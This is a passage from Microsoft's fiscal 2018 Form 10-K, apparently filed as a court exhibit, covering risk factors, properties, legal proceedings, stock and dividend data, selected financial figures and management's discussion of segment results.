products that meet our legal duties or help our customers meet their obligations under the GDPR or other data regulations, or if the changes we implement to comply with the GDPR make our offerings less attractive. The GDPR imposes significant new obligations and compliance with these obligations depends in part on how particular regulators apply and interpret them. If we fail to comply with the GDPR, or if regulators assert we have failed to comply with the GDPR, it may lead to regulatory enforcement actions, which can result in monetary penalties of up to 4% of worldwide revenue, private lawsuits, or reputational damage.

The Company's investment in gaining insights from data is becoming central to the value of the services we deliver to customers, to our operational efficiency and key opportunities in monetization, customer perceptions of quality, and operational efficiency. Our ability to use data in this way may be constrained by regulatory developments that impede realizing the expected return from this investment. Ongoing legal reviews by regulators may result in burdensome or inconsistent requirements, including data sovereignty and localization requirements, affecting the location and movement of our customer and internal employee data as well as the management of that data. Compliance with applicable laws and regulations regarding personal data may require changes in services, business practices, or internal systems that result in increased costs, lower revenue, reduced efficiency, or greater difficulty in competing with foreign-based firms. Compliance with data regulations might limit our ability to innovate or offer certain features and functionality in some jurisdictions where we operate. Failure to comply with existing or new rules may result in significant penalties or orders to stop the alleged noncompliant activity, as well as negative publicity and diversion of management time and effort.

**Our business depends on our ability to attract and retain talented employees.** Our business is based on successfully attracting and retaining talented employees. The market for highly skilled workers and leaders in our industry is extremely competitive. Maintaining our brand and reputation are important to our ability to recruit and retain employees. We are also limited in our ability to recruit internationally by restrictive domestic immigration laws. Changes to U.S. immigration policies that restrain the flow of technical and professional talent may inhibit our ability to adequately staff our research and development efforts. If we are less successful in our recruiting efforts, or if we cannot retain highly skilled workers and key leaders, our ability to develop and deliver successful products and services may be adversely affected. Effective succession planning is also important to our long-term success. Failure to ensure effective transfer of knowledge and smooth transitions involving key employees could hinder our strategic planning and execution. How employment-related laws are interpreted and applied to our workforce practices may result in increased operating costs and less flexibility in how we meet our workforce needs.

**We have claims and lawsuits against us that may result in adverse outcomes.** We are subject to a variety of claims and lawsuits. These claims may arise from a wide variety of business practices and initiatives, including major new product releases such as Windows 10, significant business transactions, warranty or product claims, and employment practices. Adverse outcomes in some or all of these claims may result in significant monetary damages or injunctive relief that could adversely affect our ability to conduct our business. The litigation and other claims are subject to inherent uncertainties and management's view of these matters may change in the future. A material adverse impact in our consolidated financial statements could occur for the period in which the effect of an unfavorable outcome becomes probable and reasonably estimable.

**We may have additional tax liabilities.** We are subject to income taxes in the U.S. and many foreign jurisdictions. Significant judgment is required in determining our worldwide provision for income taxes. In the course of our business, there are many transactions and calculations where the ultimate tax determination is uncertain. For example, compliance with the 2017 United States Tax Cut and Jobs Act ("TCJA") may require the collection of information not regularly produced within the Company, the use of estimates in our financial statements, and the exercise of significant judgment in accounting for its provisions. As regulations and guidance evolve with respect to TCJA, and as we gather more information and perform more analysis, our results may differ from previous estimates and may materially affect our financial position.

We regularly are under audit by tax authorities in different jurisdictions. Economic and political pressures to increase tax revenue in various jurisdictions may make resolving tax disputes favorably more difficult. Although we believe our tax estimates are reasonable, the final determination of tax audits and any related litigation in the jurisdictions where we are subject to taxation could be materially different from our historical income tax provisions and accruals. The results of an audit or litigation could have a material effect in our consolidated financial statements in the period or periods in which that determination is made.

We earn a significant amount of our operating income outside the U.S. A change in the mix of earnings and losses in countries with differing statutory tax rates, changes in our business or structure, or the expiration of or disputes about certain tax agreements in a particular country may result in higher effective tax rates for the Company. In addition, changes in U.S. federal and state or international tax laws applicable to corporate multinationals, other fundamental law changes currently being considered by many countries, including in the U.S., and changes in taxing jurisdictions' administrative interpretations, decisions, policies, and positions may materially adversely impact our tax expense and cash flows.

**We may experience quality or supply problems.** Our hardware products such as Xbox consoles, Surface devices, and other devices we design, manufacture, and market are highly complex and can have defects in design, manufacture, or associated software. We could incur significant expenses, lost revenue, and reputational harm as a result of recalls, safety alerts, or product liability claims if we fail to prevent, detect, or address such issues through design, testing, or warranty repairs.

Our software products also may experience quality or reliability problems. The highly-sophisticated software products we develop may contain bugs and other defects that interfere with their intended operation. Any defects we do not detect and fix in pre-release testing could cause reduced sales and revenue, damage to our reputation, repair or remediation costs, delays in the release of new products or versions, or legal liability. Although our license agreements typically contain provisions that eliminate or limit our exposure to liability, there is no assurance these provisions will withstand legal challenge.

We acquire some device and datacenter components from sole suppliers. Our competitors use some of the same suppliers and their demand for hardware components can affect the capacity available to us. If a component from a sole-source supplier is delayed or becomes unavailable, whether because of supplier capacity constraint, industry shortages, legal or regulatory changes, or other reasons, we may not obtain timely replacement supplies, resulting in reduced sales or inadequate datacenter capacity. Component shortages, excess or obsolete inventory, or price reductions resulting in inventory adjustments may increase our cost of revenue. Xbox consoles, Surface devices, datacenter servers, and other hardware are assembled in Asia and other geographies that may be subject to disruptions in the supply chain, resulting in shortages that would affect our revenue and operating margins. These same risks would apply to any other hardware and software products we may offer.

**Our global business exposes us to operational and economic risks.** Our customers are located in over 200 countries and a significant part of our revenue comes from international sales. The global nature of our business creates operational and economic risks. Our results of operations may be affected by global, regional, and local economic developments, monetary policy, inflation, and recession, as well as political and military disputes. In addition, our international growth

strategy includes certain markets, the developing nature of which presents several risks, including deterioration of social, political, labor, or economic conditions in a country or region, and difficulties in staffing and managing foreign operations. Emerging nationalist trends in specific countries may significantly alter the trade environment. Changes to trade policy or agreements as a result of populism, protectionism, or economic nationalism may result in higher tariffs, local sourcing initiatives, or other developments that make it more difficult to sell our products in foreign countries. Disruptions of these kinds in developed or emerging markets could negatively impact demand for our products and services or increase operating costs. Although we hedge a portion of our international currency exposure, significant fluctuations in foreign exchange rates between the U.S. dollar and foreign currencies may adversely affect our revenue.

**Catastrophic events or geopolitical conditions may disrupt our business.** A disruption or failure of our systems or operations because of a major earthquake, weather event, cyberattack, terrorist attack, or other catastrophic event could cause delays in completing sales, providing services, or performing other critical functions. Our corporate headquarters, a significant portion of our research and development activities, and certain other essential business operations are in the Seattle, Washington area, and we have other business operations in the Silicon Valley area of California, both of which are seismically active regions. A catastrophic event that results in the destruction or disruption of any of our critical business or IT systems could harm our ability to conduct normal business operations. Providing our customers with more services and solutions in the cloud puts a premium on the resilience of our systems and strength of our business continuity management plans, and magnifies the potential impact of prolonged service outages on our operating results.

Abrupt political change, terrorist activity, and armed conflict pose a risk of general economic disruption in affected countries, which may increase our operating costs. These conditions also may add uncertainty to the timing and budget for technology investment decisions by our customers, and may cause supply chain disruptions for hardware manufacturers. Geopolitical change may result in changing regulatory requirements that could impact our operating strategies, access to global markets, hiring, and profitability. Geopolitical instability may lead to sanctions and impact our ability to do business in some markets or with some public-sector customers. Any of these changes may negatively impact our revenues.

The long-term effects of climate change on the global economy or the IT industry in particular are unclear. Environmental regulations or changes in the supply, demand or available sources of energy or other natural resources may affect the availability or cost of goods and services, including natural resources, necessary to run our business. Changes in weather where we operate may increase the costs of powering and cooling computer hardware we use to develop software and provide cloud-based services.

**Adverse economic or market conditions may harm our business.** Worsening economic conditions, including inflation, recession, or other changes in economic conditions, may cause lower IT spending and adversely affect our revenue. If demand for PCs, servers, and other computing devices declines, or consumer or business spending for those products declines, our revenue will be adversely affected. Substantial revenue comes from our U.S. government contracts. An extended federal government shutdown resulting from failing to pass budget appropriations, adopt continuing funding resolutions or raise the debt ceiling, and other budgetary decisions limiting or delaying federal government spending, could reduce government IT spending on our products and services and adversely affect our revenue.

Our product distribution system relies on an extensive partner and retail network. OEMs building devices that run our software have also been a significant means of distribution. The impact of economic conditions on our partners, such as the bankruptcy of a major distributor, OEM, or retailer, could cause sales channel disruption.

Challenging economic conditions also may impair the ability of our customers to pay for products and services they have purchased. As a result, allowances for doubtful accounts and write-offs of accounts receivable may increase.

We maintain an investment portfolio of various holdings, types, and maturities. These investments are subject to general credit, liquidity, market, and interest rate risks, which may be exacerbated by market downturns or events that affect global financial markets. A significant part of our investment portfolio comprises U.S. government securities. If global financial markets decline for long periods, or if there is a downgrade of the U.S. government credit rating due to an actual or threatened default on government debt, our investment portfolio may be adversely affected and we could determine that more of our investments have experienced an other-than-temporary decline in fair value, requiring impairment charges that could adversely affect our financial results.

**Changes in our sales organization may impact revenues.** In July 2017, we announced plans to reorganize our global sales organization to help enable customers' digital transformation, add greater technical ability to our sales force, and create pooled resources that can be used across countries and industries. The reorganization is the most

significant change in our global sales organization in our history, involving employees changing roles, adding additional talent, realigning teams, and onboarding new partners. Successfully executing these changes will be a significant factor in enabling future revenue growth. As we continue to navigate through this transition, sales, profitability, and cash flow could be adversely impacted.

**The development of the internet of things presents security, privacy, and execution risks.** To support the growth of the intelligent cloud and the intelligent edge, we are developing products, services, and technologies to power the IoT, a network of distributed and interconnected devices employing sensors, data, and computing capabilities including AI. The IoT's great potential also carries substantial risks. IoT products and services may contain defects in design, manufacture, or operation, that make them insecure or ineffective for their intended purposes. An IoT solution has multiple layers of hardware, sensors, processors, software, and firmware, several of which we may not develop or control. Each layer, including the weakest layer, can impact the security of the whole system. Many IoT devices have limited interfaces and ability to be updated or patched. IoT solutions may collect large amounts of data, and our handling of IoT data may not satisfy customers or regulatory requirements. IoT scenarios may increasingly affect personal health and safety. If IoT solutions that include our technologies do not work as intended, violate the law, or harm individuals or businesses, we may be subject to legal claims or enforcement actions. These risks, if realized, may increase our costs, damage our reputation or brands, or negatively impact our revenues or margins.

**Issues in the use of artificial intelligence in our offerings may result in reputational harm or liability**. We are building AI into many of our offerings and we expect this element of our business to grow. We envision a future in which AI operating in our devices, applications, and the cloud helps our customers be more productive in their work and personal lives. As with many disruptive innovations, AI presents risks and challenges that could affect its adoption, and therefore our business. AI algorithms may be flawed. Datasets may be insufficient or contain biased information. Inappropriate or controversial data practices by Microsoft or others could impair the acceptance of AI solutions. These deficiencies could undermine the decisions, predictions, or analysis AI applications produce, subjecting us to competitive harm, legal liability, and brand or reputational harm. Some AI scenarios present ethical issues. If we enable or offer AI solutions that are controversial because of their impact on human rights, privacy, employment, or other social issues, we may experience brand or reputational harm.

**If our reputation or our brands are damaged, our business and operating results may be harmed**. Our reputation and brands are globally recognized and are important to our business. Our reputation and brands affect our ability to attract and retain consumer, business, and public-sector customers. There are numerous ways our reputation or brands could be damaged. These include product safety or quality issues, or our environmental impact, supply chain practices, or human rights record. We may experience backlash from customers, government entities, advocacy groups, employees, and other stakeholders that disagree with our product offering decisions or public policy positions. Damage to our reputation or our brands may occur from, among other things:

- The introduction of new features, products, services, or terms of service that customers, users, or partners do not like.
- Public scrutiny of our decisions regarding user privacy, data practices, or content.
- Data security breaches, compliance failures, or actions of partners or individual employees.

The proliferation of social media may increase the likelihood, speed, and magnitude of negative brand events. If our brands or reputation are damaged, it could negatively impact our revenues or margins, or ability to attract the most highly qualified employees.

# ITEM 1B. UNRESOLVED STAFF COMMENTS

We have received no written comments regarding our periodic or current reports from the staff of the Securities and Exchange Commission that were issued 180 days or more preceding the end of our fiscal year 2018 that remain unresolved.

# ITEM 2. PROPERTIES

Our corporate headquarters are located in Redmond, Washington. We have approximately 15 million square feet of space located in King County, Washington that is used for engineering, sales, marketing, and operations, among other general and administrative purposes. These facilities include approximately 10 million square feet of owned space situated on approximately 540 acres of land we own at our corporate headquarters, and approximately five million square feet of space we lease. In addition, we own and lease space domestically that includes office, datacenter, and retail space.

We also own and lease facilities internationally. The largest owned properties include: our research and development centers in China and India; our datacenters in Ireland, Singapore, and the Netherlands; and our operations and facilities in Ireland and the United Kingdom. The largest leased properties include space in the following locations: India, China, France, the United Kingdom, Canada, Australia, Germany, and Japan.

In addition to the above locations, we have various product development facilities, both domestically and internationally, as described under Research and Development (Part I, Item 1 of this Form 10-K).

The table below shows a summary of the square footage of our office, datacenter, retail, and other facilities owned and leased domestically and internationally as of June 30, 2018:

(Square feet in millions)

| Location | Owned | Leased | Total |
|---|---|---|---|
| U.S. | 18 | 13 | 31 |
| International | 6 | 13 | 19 |
| Total | 24 | 26 | 50 |

# ITEM 3. LEGAL PROCEEDINGS

While not material to the Company, the Company makes the following annual report of the general activities of the Company's Antitrust Compliance Office as required by the Final Order and Judgment in *Barovic v. Ballmer et al,* United States District Court for the Western District of Washington ("Final Order"). For more information see http://aka.ms/MSLegalNotice2015. These annual reports will continue through 2020. During fiscal year 2018, the Antitrust Compliance Office (a) monitored the Company's compliance with the European Commission Decision of March 24, 2004, ("2004 Decision") and with the Company's Public Undertaking to the European Commission dated December 16, 2009 ("2009 Undertaking"); (b) monitored, in the manner required by the Final Order, employee, customer, competitor, regulator, or other third-party complaints regarding compliance with the 2004 Decision, the 2009 Undertaking, or other EU or U.S. laws or regulations governing tying, bundling, and exclusive dealing contracts; and, (c) monitored, in the manner required by the Final Order, the training of the Company's employees regarding the Company's antitrust compliance polices. In addition, the Antitrust Compliance Officer reports to the Regulatory and Public Policy Committee of the Board at each of its regularly scheduled meetings and to the full Board annually.

Refer to Note 17 – Contingencies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for information regarding legal proceedings in which we are involved.

# ITEM 4. MINE SAFETY DISCLOSURES

Not applicable.

Case 0:20-cv-60416-AMC Document 3-35 Entered on FLSD Docket 02/26/2020 Page 485 of 726
Case 0:20-cv-60416-XXXX Document 1-35 Entered on FLSD Docket 02/26/2020 Page 29 of 726
PART II
Item 5

## PART II

# ITEM 5. MARKET FOR REGISTRANT'S COMMON EQUITY, RELATED STOCKHOLDER MATTERS, AND ISSUER PURCHASES OF EQUITY SECURITIES

### MARKET AND STOCKHOLDERS

Our common stock is traded on the NASDAQ Stock Market under the symbol MSFT. On July 31, 2018, there were 97,535 registered holders of record of our common stock. The high and low common stock sales prices per share were as follows:

| Quarter Ended | September 30 | December 31 | March 31 | June 30 | Fiscal Year |
|---|---|---|---|---|---|
| **Fiscal Year 2018** | | | | | |
| High | $ 75.97 | $ 87.50 | $ 97.24 | $102.69 | $ 102.69 |
| Low | 68.02 | 73.71 | 83.83 | 87.51 | 68.02 |
| **Fiscal Year 2017** | | | | | |
| High | $ 58.70 | $ 64.10 | $ 66.19 | $ 72.89 | $ 72.89 |
| Low | 50.39 | 56.32 | 61.95 | 64.85 | 50.39 |

### DIVIDENDS AND SHARE REPURCHASES

Refer to Note 18 – Stockholders' Equity of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion regarding dividends and share repurchases. Following are our monthly stock repurchases for the fourth quarter of fiscal year 2018:

| Period | Total Number of Shares Purchased | Average Price Paid per Share | Total Number of Shares Purchased as Part of Publicly Announced Plans or Programs | Approximate Dollar Value of Shares that May Yet be Purchased under the Plans or Programs |
|---|---|---|---|---|
| | | | | (in millions) |
| April 1, 2018 – April 30, 2018 | 10,320,190 | $ 93.11 | 10,320,190 | $ 29,339 |
| May 1, 2018 – May 31, 2018 | 0 | 0 | 0 | 29,339 |
| June 1, 2018 – June 30, 2018 | 11,335,224 | 100.49 | 11,335,224 | 28,200 |
| | 21,655,414 | | 21,655,414 | |

All repurchases were made using cash resources. Our stock repurchases may occur through open market purchases or pursuant to a Rule 10b5-1 trading plan. The above table excludes shares repurchased to settle employee tax withholding related to the vesting of stock awards.

# ITEM 6. SELECTED FINANCIAL DATA

### FINANCIAL HIGHLIGHTS

(In millions, except per share data)

| Year Ended June 30, | 2018 | 2017 [b][c] | 2016 [b] | 2015 | 2014 [h] |
|---|---|---|---|---|---|
| Revenue | **$110,360** | $ 96,571 | $ 91,154 | $ 93,580 | $ 86,833 |
| Gross margin | **72,007** | 62,310 | 58,374 | 60,542 | 59,755 |
| Operating income | **35,058** | 29,025 [d] | 26,078 [e] | 18,161 [g] | 27,759 |
| Net income | **16,571** [a] | 25,489 [d] | 20,539 [e] | 12,193 [g] | 22,074 |
| Diluted earnings per share | **2.13** [a] | 3.25 [d] | 2.56 [e] | 1.48 [g] | 2.63 |
| Cash dividends declared per share | **1.68** | 1.56 | 1.44 | 1.24 | 1.12 |
| Cash, cash equivalents, and short-term investments | **133,768** | 132,981 | 113,240 | 96,526 | 85,709 |
| Total assets | **258,848** | 250,312 | 202,897 [f] | 174,303 [f] | 170,569 [f] |
| Long-term obligations | **117,642** | 106,856 | 66,705 [f] | 44,574 [f] | 35,285 [f] |
| Stockholders' equity | **82,718** | 87,711 | 83,090 | 80,083 | 89,784 |

(a) *Includes a $13.7 billion net charge related to the Tax Cuts and Jobs Act, which decreased net income and diluted earnings per share ("EPS") by $13.7 billion and $1.75, respectively. Refer to Note 13 – Income Taxes of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.*

(b) *Reflects the impact of the adoption of new accounting standards in fiscal year 2018 related to revenue recognition and leases. Refer to Note 1 – Accounting Policies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.*

(c) *On December 8, 2016, we acquired LinkedIn Corporation. LinkedIn has been included in our consolidated results of operations starting on the acquisition date.*

(d) *Includes $306 million of employee severance expenses primarily related to our sales and marketing restructuring plan, which decreased operating income, net income, and diluted EPS by $306 million, $243 million, and $0.04, respectively.*

(e) *Includes $630 million of asset impairment charges related to our Phone business, and $480 million of restructuring charges associated with our Phone business restructuring plans, which together decreased operating income, net income, and diluted EPS by $1.1 billion, $895 million, and $0.11, respectively.*

(f) *Reflects the impact of the adoption of the new accounting standard in fiscal year 2017 related to balance sheet classification of debt issuance costs.*

(g) *Includes $7.5 billion of goodwill and asset impairment charges related to our Phone business, and $2.5 billion of integration and restructuring expenses, primarily associated with our Phone business restructuring plans, which together decreased operating income, net income, and diluted EPS by $10.0 billion, $9.5 billion, and $1.15, respectively.*

(h) *On April 25, 2014, we acquired substantially all of Nokia Corporation's Devices and Services business ("NDS"). NDS has been included in our consolidated results of operations starting on the acquisition date.*

# ITEM 7. MANAGEMENT'S DISCUSSION AND ANALYSIS OF FINANCIAL CONDITION AND RESULTS OF OPERATIONS

The following Management's Discussion and Analysis of Financial Condition and Results of Operations ("MD&A") is intended to help the reader understand the results of operations and financial condition of Microsoft Corporation. MD&A is provided as a supplement to, and should be read in conjunction with, our financial statements and the accompanying Notes to Financial Statements (Part II, Item 8 of this Form 10-K).

<u>OVERVIEW</u>

Microsoft is a technology company whose mission is to empower every person and every organization on the planet to achieve more. We strive to create local opportunity, growth, and impact in every country around the world. Our platforms and tools help drive small business productivity, large business competitiveness, and public-sector efficiency. They also support new startups, improve educational and health outcomes, and empower human ingenuity.

We generate revenue by licensing and supporting an array of software products; offering a wide range of cloud-based and other services to people and businesses; designing, manufacturing, and selling devices; and delivering relevant online advertising to a global audience. Our most significant expenses are related to compensating employees; designing, manufacturing, marketing, and selling our products and services; datacenter costs in support of our cloud-based services; and income taxes.

Highlights from fiscal year 2018 compared with fiscal year 2017 included:

- Commercial cloud revenue, which primarily comprises Microsoft Office 365 commercial, Microsoft Azure, Microsoft Dynamics 365, and other cloud properties, increased 56% to $23.2 billion.
- Office Commercial revenue increased 11%, driven by Office 365 commercial revenue growth of 41%.
- Office Consumer revenue increased 11% and Office 365 consumer subscribers increased to 31.4 million.
- LinkedIn contributed revenue of $5.3 billion, driven by strong momentum across all business lines.
- Dynamics revenue increased 13%, driven by Dynamics 365 revenue growth of 65%.
- Server products and cloud services revenue increased 21%, driven by Azure revenue growth of 91%.
- Enterprise Services revenue increased 5%.
- Windows original equipment manufacturer licensing ("Windows OEM") revenue increased 5%, driven by OEM Pro revenue growth of 11%.
- Windows Commercial revenue increased 12%, driven by an increased volume of multi-year agreements.
- Gaming revenue increased 14%, driven by Xbox software and services revenue growth of 20%, mainly from third-party title strength.
- Microsoft Surface revenue increased 16%, driven by a higher mix of premium devices and an increase in volumes sold, due to the latest editions of Surface.
- Search advertising revenue, excluding traffic acquisition costs, increased 16%, driven by higher revenue per search and search volume.

On June 4, 2018, we entered into a definitive agreement to acquire GitHub, Inc. for $7.5 billion in an all-stock transaction, which is expected to close by the end of the calendar year. On December 8, 2016, we completed our acquisition of LinkedIn Corporation for a total purchase price of $27.0 billion. LinkedIn has been included in our consolidated results of operations since the date of acquisition. Refer to Note 9 – Business Combinations of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

On December 22, 2017, the Tax Cuts and Jobs Act ("TCJA") was enacted into law, which significantly changes existing U.S. tax law and includes numerous provisions that affect our business. During fiscal year 2018, we recorded a net charge of $13.7 billion related to the TCJA. Refer to Note 13 – Income Taxes of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

We adopted the new accounting standards for revenue recognition and leases effective July 1, 2017. These new standards had a material impact in our consolidated financial statements. Beginning in fiscal year 2018, our financial results reflect adoption of the standards with prior periods restated accordingly. Refer to Note 1 – Accounting Policies of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K) for further discussion.

**Industry Trends**

Our industry is dynamic and highly competitive, with frequent changes in both technologies and business models. Each industry shift is an opportunity to conceive new products, new technologies, or new ideas that can further transform the industry and our business. At Microsoft, we push the boundaries of what is possible through a broad range of research and development activities that seek to identify and address the changing demands of customers and users, industry trends, and competitive forces.

**Economic Conditions, Challenges, and Risks**

The markets for software, devices, and cloud-based services are dynamic and highly competitive. Our competitors are developing new software and devices, while also deploying competing cloud-based services for consumers and businesses. The devices and form factors customers prefer evolve rapidly, and influence how users access services in the cloud, and in some cases, the user's choice of which suite of cloud-based services to use. We must continue to evolve and adapt over an extended time in pace with this changing environment. The investments we are making in infrastructure and devices will continue to increase our operating costs and may decrease our operating margins.

Our success is highly dependent on our ability to attract and retain qualified employees. We hire a mix of university and industry talent worldwide. We compete for talented individuals globally by offering an exceptional working environment, broad customer reach, scale in resources, the ability to grow one's career across many different products and businesses, and competitive compensation and benefits. Aggregate demand for our software, services, and devices is correlated to global macroeconomic and geopolitical factors, which remain dynamic.

Our international operations provide a significant portion of our total revenue and expenses. Many of these revenue and expenses are denominated in currencies other than the U.S. dollar. As a result, changes in foreign exchange rates may significantly affect revenue and expenses. Strengthening of the U.S. dollar relative to certain foreign currencies throughout fiscal year 2017 negatively impacted reported revenue and reduced reported expenses from our international operations. This trend reversed in fiscal year 2018. Strengthening of foreign currencies relative to the U.S. dollar positively impacted reported revenue and increased reported expenses from our international operations.

Refer to Risk Factors (Part I, Item 1A of this Form 10-K) for a discussion of these factors and other risks.

**Seasonality**

We expect our revenue to fluctuate quarterly and to be higher in the second and fourth quarters of our fiscal year. Second quarter revenue is driven by corporate year-end spending trends in our major markets and holiday season spending by consumers, and fourth quarter revenue is driven by the volume of multi-year on-premises contracts executed during the period.

**Reportable Segments**

We report our financial performance based on the following segments: Productivity and Business Processes, Intelligent Cloud, and More Personal Computing. The segment amounts included in MD&A are presented on a basis consistent with our internal management reporting. All differences between our internal management reporting basis and accounting principles generally accepted in the United States of America ("GAAP"), along with certain corporate-level and other activity, are included in Corporate and Other.

Additional information on our reportable segments is contained in Note 21 – Segment Information and Geographic Data of the Notes to Financial Statements (Part II, Item 8 of this Form 10-K).

## SUMMARY RESULTS OF OPERATIONS

| (In millions, except percentages and per share amounts) | 2018 | 2017 | 2016 | Percentage Change 2018 Versus 2017 | Percentage Change 2017 Versus 2016 |
|---|---|---|---|---|---|
| Revenue | $110,360 | $ 96,571 | $ 91,154 | 14% | 6% |
| Gross margin | 72,007 | 62,310 | 58,374 | 16% | 7% |
| Operating income | 35,058 | 29,025 | 26,078 | 21% | 11% |
| Net Income | 16,571 | 25,489 | 20,539 | (35)% | 24% |
| Diluted earnings per share | 2.13 | 3.25 | 2.56 | (34)% | 27% |
| Adjusted operating income | 35,058 | 29,331 | 27,188 | 20% | 8% |
| Adjusted net income | 30,267 | 25,732 | 21,434 | 18% | 20% |
| Adjusted diluted earnings per share | 3.88 | 3.29 | 2.67 | 18% | 23% |

Consolidated results of operations include LinkedIn results since the date of acquisition on December 8, 2016. Fiscal year 2018 includes a full period of LinkedIn results, whereas fiscal year 2017 only includes results from the date of acquisition.

Adjusted operating income, net income, and adjusted diluted earnings per share ("EPS") exclude the net charge related to the TCJA, and impairment and restructuring expenses. Refer to the Non-GAAP Financial Measures section below for a reconciliation of our financial results reported in accordance with GAAP to non-GAAP financial results.

### *Fiscal Year 2018 Compared with Fiscal Year 2017*

Revenue increased $13.8 billion or 14%, driven by growth across each of our segments. Productivity and Business Processes revenue increased, driven by LinkedIn and higher revenue from Office. Intelligent Cloud revenue increased, primarily due to higher revenue from server products and cloud services. More Personal Computing revenue increased, driven by higher revenue from Gaming, Windows, Search advertising, and Surface, offset in part by lower revenue from Phone.

Gross margin increased $9.7 billion or 16%, due to growth across each of our segments. Gross margin percentage increased slightly, driven by favorable segment sales mix and gross margin percentage improvement in More Personal Computing. Gross margin included a 7 percentage point improvement in commercial cloud, primarily from Azure.

Operating income increased $6.0 billion or 21%, driven by growth across each of our segments. LinkedIn operating loss increased $63 million to $987 million, including $1.5 billion of amortization of intangible assets. Operating income included a favorable foreign currency impact of 2%.

Key changes in expenses were:

- Cost of revenue increased $4.1 billion or 12%, mainly due to growth in our commercial cloud, Gaming, LinkedIn, and Search advertising, offset in part by a reduction in Phone cost of revenue.
- Sales and marketing expenses increased $2.0 billion or 13%, primarily due to LinkedIn expenses and investments in commercial sales capacity, offset in part by a decrease in Windows marketing expenses.
- Research and development expenses increased $1.7 billion or 13%, primarily due to investments in cloud engineering and LinkedIn expenses.
- General and administrative expenses increased $273 million or 6%, primarily due to LinkedIn expenses.

Current year net income and diluted EPS were negatively impacted by the net charge related to TCJA, which resulted in a decrease to net income and diluted earnings per share of $13.7 billion and $1.75, respectively. Prior year diluted EPS was negatively impacted by restructuring expenses, which resulted in a decrease in operating income, net income, and diluted EPS of $306 million, $243 million, and $0.04, respectively.

### *Fiscal Year 2017 Compared with Fiscal Year 2016*

Revenue increased $5.4 billion or 6%, driven by growth in Productivity and Business Processes and Intelligent Cloud, offset in part by lower revenue from More Personal Computing. Productivity and Business Processes revenue

increased, driven by the acquisition of LinkedIn and higher revenue from Microsoft Office. Intelligent Cloud revenue increased, primarily due to higher revenue from server products and cloud services. More Personal Computing revenue decreased, mainly due to lower revenue from Devices, offset in part by higher revenue from Windows and Search advertising.

Gross margin increased $3.9 billion or 7%, due to growth across each of our segments, including the acquisition of LinkedIn, driven by higher revenue. Gross margin percentage increased slightly due to a margin percent increase in More Personal Computing and segment sales mix, offset in part by margin percent declines in Productivity and Business Processes and Intelligent Cloud. Gross margin percentage includes a 5 percentage point improvement in commercial cloud gross margin primarily across Azure and Office 365.

Operating income increased $2.9 billion or 11%, primarily due to higher gross margin and lower impairment and restructuring expenses, offset in part by an increase in research and development and sales and marketing expenses. Operating income included an operating loss of $924 million related to the acquisition of LinkedIn, including $866 million of amortization of intangible assets. Operating income also included an unfavorable foreign currency impact of 3%. Key changes in expenses were:

- Cost of revenue increased $1.5 billion or 5%, mainly due to growth in our commercial cloud, the acquisition of LinkedIn, and higher Search advertising traffic acquisition costs, offset in part by a reduction in Phone sales and Gaming cost of revenue.

- Research and development expenses increased $1.0 billion or 9%, primarily due to LinkedIn expenses and increased investments in cloud engineering, offset in part by a reduction in Phone expenses.

- Sales and marketing expenses increased $826 million or 6%, primarily due to LinkedIn expenses and increased investments in sales capacity for our commercial cloud, offset in part by a reduction in Phone and marketing expenses.

- Impairment and restructuring expenses decreased $804 million, driven by asset impairment charges and restructuring charges related to our Phone business in fiscal year 2016, offset in part by employee severance expenses primarily related to our sales and marketing restructuring plan in fiscal year 2017.

Diluted EPS was $3.25 for fiscal year 2017, and was negatively impacted by restructuring expenses, which resulted in a decrease of $0.04. Diluted EPS was $2.56 for fiscal year 2016, and was negatively impacted by impairment and restructuring expenses, which resulted in a decrease of $0.11.

## SEGMENT RESULTS OF OPERATIONS

| (In millions, except percentages) | 2018 | 2017 | 2016 | Percentage Change 2018 Versus 2017 | Percentage Change 2017 Versus 2016 |
|---|---|---|---|---|---|
| **Revenue** | | | | | |
| Productivity and Business Processes | $ 35,865 | $ 29,870 | $ 25,792 | 20% | 16% |
| Intelligent Cloud | 32,219 | 27,407 | 24,952 | 18% | 10% |
| More Personal Computing | 42,276 | 39,294 | 40,410 | 8% | (3)% |
| Total | $110,360 | $ 96,571 | $ 91,154 | 14% | 6% |
| **Operating Income (Loss)** | | | | | |
| Productivity and Business Processes | $ 12,924 | $ 11,389 | $ 11,756 | 13% | (3)% |
| Intelligent Cloud | 11,524 | 9,127 | 9,249 | 26% | (1)% |
| More Personal Computing | 10,610 | 8,815 | 6,183 | 20% | 43% |
| Corporate and Other | 0 | (306) | (1,110) | * | * |
| Total | $ 35,058 | $ 29,025 | $ 26,078 | 21% | 11% |

* *Not meaningful*

Case 0:20-cv-60416-XXXX   Document 3-35 Entered on FLSD Docket 02/26/2020   Page 491 of 726
Case 0:20-cv-60416-XXXX   Document 1-35 Entered on FLSD Docket 02/26/2020   Page 35 of 726

PART II
Item 7

## Reportable Segments

### Fiscal Year 2018 Compared with Fiscal Year 2017

*Productivity and Business Processes*

Revenue increased $6.0 billion or 20%.

- LinkedIn revenue increased $3.0 billion to $5.3 billion. Fiscal year 2018 includes a full period of results, whereas fiscal year 2017 only includes results from the date of acquisition on December 8, 2016. LinkedIn revenue primarily consisted of revenue from Talent Solutions.

- Office Commercial revenue increased $2.4 billion or 11%, driven by Office 365 commercial revenue growth, mainly due to growth in subscribers and average revenue per user, offset in part by lower revenue from products licensed on-premises, reflecting a continued shift to Office 365 commercial.

- Office Consumer revenue increased $382 million or 11%, driven by Office 365 consumer revenue growth, mainly due to growth in subscribers.

- Dynamics revenue increased 13%, driven by Dynamics 365 revenue growth.

Operating income increased $1.5 billion or 13%, including a favorable foreign currency impact of 2%.

- Gross margin increased $4.4 billion or 19%, driven by LinkedIn and growth in Office commercial. Gross margin percentage decreased slightly, due to an increased mix of cloud offerings, offset in part by gross margin percentage improvement in Office 365 commercial and LinkedIn. LinkedIn cost of revenue increased $818 million to $1.7 billion, including $888 million of amortization for acquired intangible assets.

- Operating expenses increased $2.9 billion or 25%, driven by LinkedIn expenses and investments in commercial sales capacity and cloud engineering. LinkedIn operating expenses increased $2.2 billion to $4.5 billion, including $617 million of amortization of acquired intangible assets.

